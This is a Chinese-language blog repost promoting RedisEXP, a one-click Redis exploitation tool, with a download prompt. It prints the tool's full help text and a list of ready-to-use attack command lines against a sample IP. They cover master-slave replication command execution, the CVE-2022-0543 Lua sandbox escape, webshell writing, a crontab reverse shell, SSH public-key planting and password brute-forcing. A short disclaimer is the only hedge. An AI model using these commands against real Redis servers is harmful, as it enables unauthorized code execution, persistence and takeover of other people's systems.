【实用工具 | 附下载】 RedisEXP 一键利用Tools支持CVE-2022-0543等 ·····

【实用工具 | 附下载】 RedisEXP 一键利用Tools支持CVE-2022-0543等 ·····
免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删 2023-2-9 18:7:44 Author: 渗透Xiao白帽(查看原文) 阅读量:47 收藏

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01 工具介绍

Redis 漏洞利用工具。

λ RedisEXP.exe -h
██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝
Usage of RedisEXP.exe:  -brute        爆破 Redis 密码  -c string        执行命令 (default "whoami")  -cli        执行 Redis 命令  -console        使用交互式 shell  -crontab        Linux 定时任务反弹 Shell (crontab.txt)  -exec        主从复制-命令执行  -lfile string        需要上传的文件名  -lhost string        本地 IP  -lport string        本地端口 (default "21000")  -lua        Lua沙盒绕过命令执行 CVE-2022-0543  -pwd string        设置密码  -pwdf string        设置密码字典  -rfile string        保存在目标的文件名  -rhost string        目标 IP  -rpath string        保存在目标的目录 (default ".")  -rport string        目标端口 (default "6379")  -shell        备份写 Webshell (shell.txt)  -show        工具利用命令帮助  -slaveof        关闭主从复制  -so string        设置 exp.dll | exp.so (default "exp.dll")  -ssh        Linux写 SSH 公钥 (ssh.txt)  -upload        主从复制-文件上传

0x02 安装与使用

常用命令：

主从复制命令执行:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -execRedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console
Linux:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -so exp.soRedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console -so exp.so
主从复制文件上传:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -rfile dump.rdb -lfile dump.rdb -upload
主动关闭主从复制:RedisExp.exe -rhost 192.168.211.131 -slaveof
Lua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe -rhost 192.168.211.131 -lua -console
备份写 Webshell:RedisExp.exe -rhost 192.168.211.131 -shell
Linux 写计划任务:RedisExp.exe -rhost 192.168.211.131 -crontab
Linux 写 SSH 公钥:RedisExp.exe -rhost 192.168.211.131 -ssh
爆破 Redis 密码:RedisExp.exe -rhost 192.168.211.131 -brute -pwdf ../pass.txt
执行 Redis 命令:RedisExp.exe -rhost 192.168.211.131 -cli

0x03 项目链接下载

1、通过阅读原文，到项目地址下载

2、编译好的工具需要自取

点击下方名片回复" Redis666"获取

觉得内容不错，就点下“赞”和“在看”
如侵权请私聊公众号删文

文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247496749&idx=1&sn=7d64b1cab3a91f992c9c63df718a2ebc&chksm=ea340b77dd438261c3a8e9028cb4a138046cbe5d6bdac3a84927bab62f19b7ec68f913cee250#rd
如有侵权请联系:admin#unsafe.sh